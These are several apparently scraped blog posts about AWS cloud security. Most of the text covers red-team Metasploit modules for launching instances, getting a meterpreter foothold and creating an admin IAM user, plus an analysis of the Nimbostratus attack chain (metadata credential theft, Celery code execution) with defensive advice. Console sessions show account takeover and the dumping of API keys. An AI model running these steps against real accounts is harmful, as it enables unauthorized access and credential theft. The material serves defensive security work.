The Cumulus Toolkit – Launch Instances Module

There are times when having owned a Cloud account (complete account takeover, see this post) is not enough. In some cases, there may not be many resources in the account or data in the account are, from a security standpoint, simply uninteresting. However, the Blast Radius of a compromised account may extend to other accounts, datacenters and/or other hosts, if the compromised account has VPC peers, a persistent VPN connection and/or other network tunnels. Here we present the Launch Instances module, a module for running unauthorized workloads, which can be used to traverse into a VPC peer, escalate privileges and/or launch other unauthorized workloads.

Code here:


Shell #1:

 > use auxiliary/admin/aws/aws_launch_instances
 > set AccessKeyId ...
 > set SecretAccessKey ...
 > set SSH_PUB_KEY ssh-rsa ABCDEDG123...
 > run
 [*] Created security group: sg-abcdefg
 [*] Launching instance(s) in us-west-2, AMI: ami-1e299d7e, key pair name: admin, security group: sg-abcdefg, subnet ID: subnet-hijklmn
 [*] Launched instance i-12345678 in us-west-2 account 012345678900
 [*] instance i-12345678 status: initializing
 [*] instance i-12345678 status: ok
 [*] Instance i-12345678 has IP adrress
 [*] Auxiliary module execution completed

Shell #2:

 ssh ec2-user@ -L 2447:

Shell #1 again:

 > load aggregator
 > aggregator_connect

For more information on metasploit-aggregator, see


AWS API Access Keys

API access keys can be used to make calls against the AWS API, to say
retrieve deployment packages from S3.


The VPC or Virtual Private Cloud, an isolated local area network. Network access
can be made available by assigning an Internet routable IP address to a host or
routing traffic to it through an ELB (Elastic Load Balancer). In either case
security-groups are used to open access to network ranges and specific TPC/UDP
ports. Security-groups provide much of the functionality of traditional firewalls
and can be configured by specifyig a protocol, a CIDR and a port.

How it Works

Although hosts can be launched using the
Web console or the CLI, launching a host in the Cloud requires a fair
amount of configuration; this module does its best to abstract configuration
requirements away from the user by auto detecting the VPC, subnets, creating
security groups, etc. It performs several tasks to launch a host with
a public IP address, these are as follow: 1) select a VPC, 2) select a subnet, 3)
create/select a security group, 4) create/select a key-pair, and 5) launch
a host.

The module will attempt to launch the host in the first VPC it finds in the
given region (`Region` option). Most of the time there is only one VPC per
account per region, however one might find multiple VPCs within the same region.
In this case, one may use the `VPC_ID` advanced option to specify the VPC to
use. Selecting a subnet is a bit more complicated. To have traffic routed
between us and the Cloud host, a public subnet (a subnet that is routable to an
Internet gateway) must be selected and the Cloud host must be associated with
an Internet routable IP address. The module dynamically finds which subnet to
launch the host in. It will use the first subnet it finds having the
`Auto-assign Public IP` option set, if no such subnet exists, then it will
select the first subnet having an Internet gateway. To circumvent this process,
the `SUBNET_ID` advanced option can be set.

When launching a Cloud host at least one security group is required. There are
several advanced options for creating/selecting a security group. The
`SEC_GROUP_ID` option works much in the same way the `VPC_ID` option does.
That is, the module will create a security group unless the `SEC_GROUP_ID`
options is set. If the `SEC_GROUP_ID` option is not set, the module will attempt
to create a security group using the values specified in the `SEC_GROUP_CIDR`,
`SEC_GROUP_NAME`, and `SEC_GROUP_PORT` options as configuration.

The `KEY_NAME` and `SSH_PUB_KEY` options are used in conjunction to select or
create a key-pair (a named SSH public key). Key-pairs are used to authenticate
to the host once it is running. The `KEY_NAME` defaults to admin while
`SSH_PUB_KEY` is optional. If the `SSH_PUB_KEY` is left unset, then the module
will not attempt to create a key-pair and will simply attempt to launch the
instance using an existing key-pair denoted by `KEY_NAME`. To set the
`SSH_PUB_KEY` option, a public SSH key must be provided as can be generated by
`ssh-keygen -y -f <private key filename>`. Once a key-pair is created/selected,
the module launches the host via the AWS API specifying that it should
associate a public IP address.

As part of launching the host it passes user-data (shell script) that installs
metasploit-aggregator and runs it in a screen session.


The Launch Instances module is an auxiliary module that can be loaded using the
use command. To run the module, only the `AccessKeyId`, `SecretAccessKey`, and
`KEY_NAME` options are required.

Basic Options:

* `AMI_ID`: The Amazon Machine Image (AMI) ID (region dependent)
* `RHOST`: the AWS EC2 Endpoint (, may change this to something closer to you
* `Region`: The default region (us-west-2), must match endpoint
* `AccessKeyId`: AWS API access key
* `SecretAccessKey`: AWS API secret access key
* `Token`: AWS API session token, optional
* `KEY_NAME`: The SSH key to be used for ec2-user
* `SSH_PUB_KEY`: The public SSH key to be used for ec2-user, e.g., “ssh-rsa ABCDE…”
* `USERDATA_FILE`: The script that will be executed on start

Advanced Options:

* `INSTANCE_TYPE`: The instance type
* `MaxCount`: Maximum number of instances to launch
* `MinCount`: Minumum number of instances to launch
* `ROLE_NAME`: The instance profile/role name
* `RPORT:` AWS EC2 Endpoint TCP Port
* `SEC_GROUP_ID`: the EC2 security group to use
* `SEC_GROUP_CIDR`: the EC2 security group network access CIDR, defaults to
* `SEC_GROUP_NAME`: the EC2 security group name
* `SEC_GROUP_PORT`: the EC2 security group network access port, defaults to tcp:22
* `SUBNET_ID`: The public subnet to use
* `UserAgent`: The User-Agent header to use for all requests
* `VPC_ID`: The EC2 VPC ID


The Launch Instances module is an auxiliary module that can be loaded using the
use command. To run the module, only the `AccessKeyId`, `SecretAccessKey`, and
`KEY_NAME` options are required.

 msf > use auxiliary/admin/aws/aws_launch_instances
 msf auxiliary(aws_launch_instances) > show options

Module options (auxiliary/admin/aws/aws_launch_instances):

Name             Current Setting              Required  Description
 ----             ---------------              --------  -----------
 AMI_ID           ami-1e299d7e                 yes       The Amazon Machine Image (AMI) ID
 AccessKeyId                                   yes       AWS access key
 KEY_NAME         admin                        yes       The SSH key to be used for ec2-user
 Proxies                                       no        A proxy chain of format type:host:port[,type:host:port][...]
 RHOST    yes       AWS region specific EC2 endpoint
 Region           us-west-2                    yes       The default region
 SSH_PUB_KEY                                   no        The public SSH key to be used for ec2-user, e.g., "ssh-rsa ABCDE..."
 SecretAccessKey                               yes       AWS secret key
 Token                                         no        AWS session token
 USERDATA_FILE                                 no        The script that will be executed on start

msf auxiliary(aws_launch_instances) > set SecretAccessKey asdfasd+asdfasdfasd...
 SecretAccessKey => asdfasd+asdfasdfasd...
 msf auxiliary(aws_launch_instances) > set AccessKeyId AKIAAKIAAKIAAKIAAKIAA
 msf auxiliary(aws_launch_instances) > set KEY_NAME ec2-user-key
 KEY_NAME => ec2-user-key
 msf auxiliary(aws_launch_instances) > set SSH_PUB_KEY ssh-rsa ABCDEDG123...
 SSH_PUB_KEY => ssh-rsa ABCDEDG123...
 msf auxiliary(aws_launch_instances) > run

[*] Created ec2-user-key (ab:cd:ef:12:34:56:78:90:ab:ac:ad:ab:a1:23:45:67)
 [*] Created security group: sg-12345678
 [*] Launching instance(s) in us-west-2, AMI: ami-1e299d7e, key pair name: ec2-user, security group: sg-12345678, subnet ID: subnet-abcdefgh
 [*] Launched instance i-12345678 in us-west-2 account 123456789012
 [*] instance i-12345678 status: initializing
 [*] instance i-12345678 status: initializing
 [*] instance i-12345678 status: ok
 [*] Instance i-12345678 has IP address
 [*] Auxiliary module execution completed

When the host has passed its primary system checks, the IP address will be
displayed. We can use this IP address to SSH to the host. Please note that
most users will want to set the `SEC_GROUP_CIDR` option to restrict access to
our new Cloud host.

To SSH into the host, you must specify the SSH key, and ec2-user username, e.g.,

 $ ssh -i ec2-user-key ec2-user@ -L 2447:
 The authenticity of host ' (' can't be established.
 ECDSA key fingerprint is SHA256:ePj6WtCeK...
 Are you sure you want to continue connecting (yes/no)? yes
 Warning: Permanently added '' (ECDSA) to the list of known hosts.
 __|  __|_  )
 _|  (     /   Amazon Linux AMI
 5 package(s) needed for security, out of 9 available
 Run "sudo yum update" to apply all updates.
 [ec2-user@ip-172-31-8-176 ~]$

Back in the Metasploit console you can now connect via aggregator:

 msf auxiliary(aws_launch_instances) > load aggregator
 msf auxiliary(aws_launch_instances) > aggregator_connect
 [*] Connecting to Aggregator instance at
 msf auxiliary(aws_launch_instances) >

Formation of the Cumulus Toolkit

Just got home after a busy week at RSA 2017 and wanted to recap our presentation and expand on some issues. If you’d like to checkout the video, here it is.

The Cloud gives us the power we need to crush those who oppose us… well not really, but I really do love how easy it is to spin up resources on demand and how easy it is to deploy my application. I can literally go from zero infrastructure to a highly available application within minutes. This power and ease however does come at a price as it is very easy to be insecure in the Cloud.  Anyone that has ever uploaded their API access keys to GitHub knows what a nightmare this can be [1], [2], [3].

There are many players in the Cloud Services Provider space, but one stands alone. Amazon Web Services (AWS) has many times more computing capacity than its fourteen largest competitors combined [4]. It is for this reason that we concentrate on AWS and will use AWS, and the Cloud interchangeably from here on.

Many of us have been living in the safe confines of our datacenters for far too long. Datacenters usually have strict configuration management, intrusion detection systems, and processes for making changes that impact network security such as opening access through the firewall. As DevOps engineers, this crunchy outer shell tends to make us feel safe and could detach us from owning our own security. Guess what, in the Cloud there is no such crunchy shell and there is little configuration management when it comes to restricting/managing whom make changes, as separation of duties has certain challenges in the Cloud.

The cloud is growing rapidly and there are a lot of folks jumping on the band wagon whom may not have a good grasp of the attack surface. The combination of this new attack surface and lack of understanding results in insecure apps making it to production, which is low hanging fruit for attackers.

Identity and Access Management

Identity and Access Management (IAM) in the Cloud is part of the new attack surface and is easy to get it wrong. IAM is used to control who has access to what and policies codify this access. Access policies can be applied to users, groups, and roles and have an Effect: allow or deny, Action: specific API actions, Resources: the things we are controlling access to, and Conditions: additional controls for restricting access.

The way we see it, there are three types of policies. The Good, a minimum privileges policy that specifies resources and makes use of conditions. The Bad, where wild cards are used to give wide access to every action available on a service and where we begin to commingle IAM access with DevOps access, and finally, The Ugly. This is the infamous star-dot-star (*.*) policy which allows any action on any resource without making use of conditions. So, how do you determine if your policies implement minimum privileges or are otherwise not bad or ugly? The approach we have taken to determine if we if we have a bad or ugly policy is red teaming, i.e., we actively attempt to take over accounts where we see weaknesses. This allows us to concentrate on the most atrocious misuses of IAM so that DevOps engineers concentrate on fixing the most dangerous configurations.

The Cumulus Toolkit

We used to do much of our red teaming tasks by hand and have noticed a there is a lack of tools for testing the security of Cloud deployments, so we have taken the time to automate our attacks. We are in the process of developing the cumulus toolkit, a cloud exploitation toolkit which is based on Metasploit, an open source exploitation framework.

At RSA we showcased and demonstrated a few Cumulus modules. The first is the CIAMU (Create IAM User) module, a post exploitation module used to create an IAM user with admin privileges. The second module is the Launch Instances Modules. Often, we compromise a host or access keys that have EC2 privileges and so they may allow us to launch an instance with elevated privileges. We can then use this new access to escalate privileges further. Lastly, we have the IAM account lockout module. This is the most evil module of them all. It can be used to lock all other users out of an account. A word of caution, never use this module in a production environment as it will remove all users’ passwords and disable their access keys.

For more information about Cumulus please follow development here:


AWS does give us everything we need to secure our environments. IAM is very granular and has controls to restrict where API access keys can be used from. Issues raised here and in our presentation, are really education and awareness issues that can be addressed with proper training. A useful strategy for developing IAM policy and potentially staying safe from these attacks is to put the attacker hat on and try to think of ways bad guys can take advantage of your controls. Think about blast radius containment, read the docs especially for IAM and lastly try not to be the guinea pig; just because there is a new sexy service that everybody is talking about, it doesn’t mean that you should make use of it in your critical applications.

* Presentation:
* Slides:

Works Cited

[1]  D. Pauli, “Dev put AWS keys on Github. Then BAD THINGS happened,” The Register , 6 January 2015. [Online]. Available: dev_blunder_shows_github_crawling_with_k eyslurping_bots/ . [Accessed 5 January 2017].
[2]  S. Gooding, “Ryan Hellyer’s AWS Nightmare: Leaked Access Keys Result in a $6,000 Bill Overnight,” WP Tavern , 26 September 2014. [Online]. Available: . [Accessed 5 January 2017].
[3]  M. Kotadia, “AWS urges developers to scrub GitHub of secret keys,” iTnews, 24 March 2014. [Online]. Available: . [Accessed 5 January 2017].
[4]  L. Leong, G. Petri, B. Gill and M. Dorosh, “Magic Quadrant for Cloud Infrastructure as a Service, Worldwide,” Gartner, Stamford, 2016.

AWS Account Takeover – The Metasploit Way

I’ve been taking over AWS accounts the manual way for way too long. This module has been in the works for about a year and it wasn’t until our presentation was accepted to RSA 2017 that I finally committed the time to getting the Pull Request into Metasploit.

The Metasploit Module: aws_create_iam_user

aws_create_iam_user is a simple post module that can be used to take over AWS accounts. Sure, it is fun enough to take over a single host, but you can own all hosts in the account if you simply create an admin user.


This module depends on administrators being lazy and not using the least privileges possible. Only on rare cases, probably close to none, should instances have the following privileges.

  • iam:CreateUser
  • iam:CreateGroup
  • iam:PutGroupPolicy
  • iam:AddUserToGroup
  • iam:CreateAccessKey

Establish a foothold

You first need a foothold in AWS, e.g., here we use sshexec to get the foothold and launch a meterpreter session.

$ ./msfconsole
msf > use exploit/multi/ssh/sshexec
msf exploit(sshexec) > set password some_user
password => some_user
msf exploit(sshexec) > set username some_user
username => some_user
msf exploit(sshexec) > set RHOST
msf exploit(sshexec) > set payload linux/x86/meterpreter/bind_tcp
payload => linux/x86/meterpreter/bind_tcp
msf exploit(sshexec) > exploit -j
[*] Exploit running as background job.

[*] Started bind handler
msf exploit(sshexec) > [*] - Sending stager...
[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
[*] Command Stager progress -  42.09% done (306/727 bytes)
[*] Command Stager progress - 100.00% done (727/727 bytes)
[*] Sending stage (1495599 bytes) to
[*] Meterpreter session 1 opened ( -> at 2016-11-21 17:58:42 +0000

We will be using session 1.

msf exploit(sshexec) > sessions

Active sessions

  Id  Type                   Information                                                                       Connection
  --  ----                   -----------                                                                       ----------
  1   meterpreter x86/linux  uid=50011, gid=50011, euid=50011, egid=50011, suid=50011, sgid=50011 @ ip-19-... -> (

Create IAM User

Now you can load aws_create_iam_user and specify a meterpreter sesssion, e.g., SESSION 1.

msf exploit(sshexec) > use auxiliary/admin/aws/aws_create_iam_user
msf post(aws_create_iam_user) > set IAM_USERNAME metasploit
IAM_USERNAME => metasploit
msf post(aws_create_iam_user) > set SESSION 1
msf post(aws_create_iam_user) > exploit

[*] - looking for creds...
[*] Creating user: metasploit
[*] - Connecting (
[!] Path: /
[!] UserName: metasploit
[!] Arn: arn:aws:iam::097986286576:user/metasploit
[!] UserId: AIDA...
[!] CreateDate: 2016-11-21T17:59:50.010Z
[*] Creating group: metasploit
[*] - Connecting (
[!] Path: /
[!] GroupName: metasploit
[!] Arn: arn:aws:iam::097986286576:group/metasploit
[!] GroupId: AGPAIENI6YTM5JVRQ2452
[!] CreateDate: 2016-11-21T17:59:50.554Z
[*] Creating group policy: metasploit
[*] - Connecting (
[!] xmlns:
[!] ResponseMetadata: {"RequestId"=>"4c43248-d314-1226-bedd-234234232"}
[*] Adding user (metasploit) to group: metasploit
[*] - Connecting (
[!] xmlns:
[!] ResponseMetadata: {"RequestId"=>"4c43248-d314-1226-bedd-234234232"}
[*] Creating API Keys for metasploit
[*] - Connecting (
[!] AccessKeyId: AKIA...
[!] SecretAccessKey: THE SECRET ACCESS KEY...
[!] AccessKeySelector: HMAC
[!] UserName: metasploit
[!] Status: Active
[!] CreateDate: 2016-11-21T17:59:51.967Z
[+] API keys stored at: /home/pwner/.msf4/loot/20161121175902_default_52.1.2.3_AKIA_881948.txt
[*] Post module execution completed
msf post(aws_create_iam_user) > exit -y

You can see the API keys stored in loot:

$ cat ~/.msf4/loot/20161121175902_default_52.1.2.3_AKIA_881948.txt

{"AccessKeyId":"AKIA...","SecretAccessKey":"THE SECRET ACCESS KEY...","AccessKeySelector":"HMAC","UserName":"metasploit","Status":"Active","CreateDate":"2016-11-21T17:59:51.967Z"}

The Dangers of All-You-Can-Eat Copy-Pasta

DevSecOps enables small projects to move fast, some times too fast. In the early stages of implementing a DevSecOps project, engineers get used to moving fast and getting the job done. The truth is that DevSecOps is challenging because it requires an engineer to think at all levels of an application and often implement each layer; this is what we call a full-stack engineer. Engineers often borrow code from each other, modify it to fit their needs, and move on to the next problem. After all, why reinvent the wheel when someone else already has. The issue with this approach is that one may not take the time to fully understand what the code does.

Copied code often has unused or insecure functionality because the new scope under which this code is now being used differs from its original intent. In addition, any errors that were originally implemented within the code are carried onto the new task. This unused/insecure code can stick around from project to project like a vestigial tail. This pattern of duplicating code with the intent of moving fast and just getting the job done is the anti-patter we call all-you-can-eat copy-pasta.

What to do if your project has fallen victim to the dangers of all-you-can-eat copy-pasta? Well, admitting that you have a problem is the first step. The second step is to allow your project to slow down, not too much, just enough to do some long overdue cleanup. Start reviewing your code and remove any vestigial tails–unused code or code that will expose your software to security flaws or denials-of-service. Reviewing your code will allow you to identify where code has been duplicated. Implement libraries for tasks requiring common functionality where it makes sense. This way, common functionality becomes maintainable and localized. Implementing fixes only require changes in one place instead of in every project that slightly modified the code. Lastly, instill within project engineers that copying code without understanding has many pitfalls and to be on the lookout for areas within in your project that can benefit from having a centralized library or code base.

Splunk App for AWS Proxy and Instance Profiles for CloudTrail

Proxying the Splunk App for AWS through boto.cfg. Because sometimes you want to deploy Splunk in a VPC and have it proxy out to the AWS API.

$ cat /etc/boto.cfg
proxy = IP_ADDRESS
proxy_port = PORT

Using Instance profiles for the Splunk App for AWS. Because you don’t want to hard code your IAM creds into Splunk or save them in clear text and using Instance profiles is way cooler.

$ cd $SPUNK_HOME/etc/apps/SplunkAppforAWS/bin
# diff
< #sqs_queue_region,
< #aws_access_key_id=key_id,
< #aws_secret_access_key=secret_key
< sqs_queue_region
> sqs_queue_region,
> aws_access_key_id=key_id,
> aws_secret_access_key=secret_key
< #aws_access_key_id=key_id,
< #aws_secret_access_key=secret_key
> aws_access_key_id=key_id,
> aws_secret_access_key=secret_key

Now you can do this in the Splunk App for AWS:


Preventing Nimbostratus Attacks on AWS

A formless layer that is almost uniformly dark gray

Security researchers and bad guys alike are beginning to turn their sights onto AWS. Recent conferences have given light to a number of AWS specific vulnerabilities and new tools to exploit these vulnerabilities. Nimbostratus is a proof-of-concept (PoC) fingerprinting and exploitation tool for AWS developed by Andres Riancho. It uses application vulnerabilities and AWS insecure settings to pivot and escalate Cloud access. The following is an exploratory investigation of security issues raised by the Nimbostratus toolkit and Paper.

The Chained Attack

The Nimbostratus toolkit exploits known application and infrastructure vulnerabilities and is dependent on a chain of vulnerabilities to gain system level privileges on an AWS hosted instance and Administrator level access on the hosting AWS Account. The following is an account of how these vulnerabilities can be linked together.

At a high level the chain of vulnerabilities is as follow: 1) An Application vulnerability is exploited to proxy the Metadata service. 2) The Metadata service is leveraged to retrieve IAM credentials. 3) Credential permissions are enumerated. 4) Compromised IAM credentials are used to write an SQS message that will 5) execute code via a vulnerable SQS application on the target instance. 6) Other IAM credentials are retrieved from the compromised instance to 7) create an Administrator IAM user.

HTTP Request Proxy Vulnerability

To get a foot hole in AWS, Nimbostratus depends on an application level vulnerability to proxy requests. Request proxying is common in web applications to reach backend resources (or other resources behind the DMZ), however, application proxying is rarely implemented with a whitelist of available resources. In the PoC, Nimbostratus authors use such a vulnerability to retrieve the AMI ID and other confidential information from a vulnerable server.


In addition to the AMI ID, the meta-data service divulges other sensitive information:

  • AWS Region
  • IP Address
  • Instance Type
  • Instance Profile Credentials

Although gaining the initial foot hole depends a very specific vulnerability in the PoC, it is not inconceivable that other similar vulnerabilities such as command injection could be exploited for this very purpose.

Dumping Instance Profile Credentials

Instances often have profiles attached to them. From the AWS Identity and Access Management documentation: An instance profile is a container for IAM roles. Instance profiles are used to pass role information to an Amazon EC2 instance when the instance starts. When you use the Amazon EC2 console to launch an instance with an IAM role, the console displays a list of roles, which is populated with instance profile names.

This means that in order for the instance to make use of its IAM role, it must first retrieve its own credentials, this can be easily done by leveraging the meta-data service. E.g., curl<profile name>. An application vulnerability that proxies the Metadata service can be exploited to divulge instance profile credentials.

// img here, it’s coming

Note the Access Key ID, Secret Access Key and Security Token are easily retrievable.

Enumerating IAM Permissions

Given the Access Key ID, Secret and Token, the Nimbostratus toolkit can be used to enumerate permissions available to the IAM user:

// img here, it’s coming

Although not entirely clear here, these credentials can be used to read & write to SQS.

Exploiting SQS for Arbitrary Code Execution

The next step in the chain of exploitation in the PoC was to exploit a vulnerable SQS client running on the target instance. A number of Messaging applications exist that make working with Amazon SQS easier. One such application which prides itself in its ease of use is the Celery Project, from the Celery Project Website: Celery is a simple, flexible and reliable distributed system to process vast amounts of messages, while providing operations with the tools required to maintain such a system. It’s a task queue with focus on real-time processing, while also supporting task scheduling…

Although Celery may be easy to use, its authors admit that parts of it, e.g., the pickle serializer, are inherently insecure because its lazy use of evaluating data as code. The result of such evaluation makes gaining of system level privileges on any host using the Celery’s serializer, given compromised SQS credentials as describe above, possible. All an attacker needs to do is to inject a message formatted with python commands that return a shell to a listening server.

IAM Privilege Escalation

Once there is a clear path for arbitrary code execution on a Cloud host, gaining system level privileges is trivial. The Cloud instance in the PoC can now be searched for additional IAM credentials and if it just so happens that there are other IAM credentials with specific permissions that allow privilege escalation, an IAM Administrator account can be created. IAM privilege escalation is possible when a user has IAM-capabilities that allow her to create other IAM users. More specifically, they need these IAM permissions:

  • CreateUser
  • CreateAccessKey
  • PutUserPolicy

The compromised credentials can be used to create a user that has all access to all services.


Although the vulnerabilities exploited in the Nimbostratus paper are setup by the authors, they do convey that seemingly low risk vulnerabilities can be used to gain system level access and take control of an AWS account. None of the vulnerabilities demonstrated here are overly complex and are often seen in Industry applications.

Attack Prevention Strategies

Web Application Vulnerabilities

The key takeaway is that application security is the first line of defense; Threat Modeling, Static & Dynamic testing, and Penetration testing if performed during the development lifecycle are proven to reduce the number of vulnerabilities that could expose infrastructure to attack.

Use an Alternative to the Metadata Service

Secrets are often passed in through the instance profile or user-data through the Metadata service; all instance profile and user-data is available to any user or process running on the instance. There is no way to delete these secrets after instance startup, so anybody who has access to the instance can simply request Needless to say, but this practice should be discouraged, and use an alternative method for transferring credentials should be employed.

Disable the Metadata Service

A strategy that may help constrain the Metadata service is to make it inaccessible by null routing it. The Metadata service can be disabled by adding a reject route at the end of the user-data, this effectively ensures that only root can re-enable the services. E.g.,

# route add -host reject

Non-root users would first need to get appropriate authorization before they could enable and read from the service.

Don’t Eat Celery

Beware of third party messaging tools that consume data and treat it as code. Tools such as Celery that use eval methods for parsing data are unsafe and their use is discouraged.

Other high level recommendations

  • Always make use the Principle of Least Privilege
  • Always use IAM credentials instead of root account
  • Use Different users for different tasks
  • Audit users and groups


AWS A through Z… Boto Soup… Some clever title P1

I’ve been staying up a bit longer than I usually do and wanted to dedicate some time to Amazon Web Services (AWS), with emphasis on the S. I’ve been cooking up a bit boto soup to check all the AWS managed services. These are simple checks (initially), just one or two checks per service to see if it is in use. Applications for doing this are many, I just would like to get a bit more familiar with the Boto API and the AWS services.

Let’s write a simple class that helps us with managing the credentials

class AwsServiceScanner:
    def __init__(self, key, secret):
        self.key = key
        self.secret = secret

if __name__ == "__main__":
    key, secret = os.environ['AWS_ACCESS_KEY_ID'], os.environ['AWS_SECRET_ACCESS_KEY']
    scanner = AwsServiceScanner(key, secret)

Nothing fancy, just pull the environment variables and add them as instance variables of a an empty class. What we want to do is to go through EVERY service and determine if it is being used, the results of which will be saved to a dictionary. Every service in in every region that is.

    def is_ec2_in_use(self):
        for region in boto.ec2.regions():
            conn = boto.ec2.connect_to_region(,
            print len(conn.get_all_instances()) != 0

Easy enough to determine it EC2 is being used, we simply iterate through the regions, connect to each one and pull the instances. If instances are returned, then we know the service is in use. We can do a bit better, let’s try to print the service (EC2) and the region.

    def is_ec2_in_use(self):
        name = "EC2 ({!s})\t\t"
        for region in boto.ec2.regions():
            conn = boto.ec2.connect_to_region(,
            print {name.format( len(conn.get_all_instances()) != 0}

Now we can tell if a service in a region is being used, here is an attempt to generalize the pattern.

    def is_service_in_use(self, name, region_name, fn, params={}):
            service_region_name = name.format(region_name)
            if SERVICES.has_key(service_region_name):
                SERVICES[service_region_name] = SERVICES[service_region_name] or len(fn(**params)) != 0
                SERVICES[service_region_name] = len(fn(**params)) != 0
            print "Error calling '"+fn.__name__+"()' for "+name.format(region_name)

    def is_ec2_in_use(self):
        name = "EC2 ({!s})\t\t"
        for region in boto.ec2.regions():
            conn = boto.ec2.connect_to_region(,
            self.is_service_in_use(name,, conn.get_all_instances)
            self.is_service_in_use(name,, conn.get_all_addresses)

To be continued…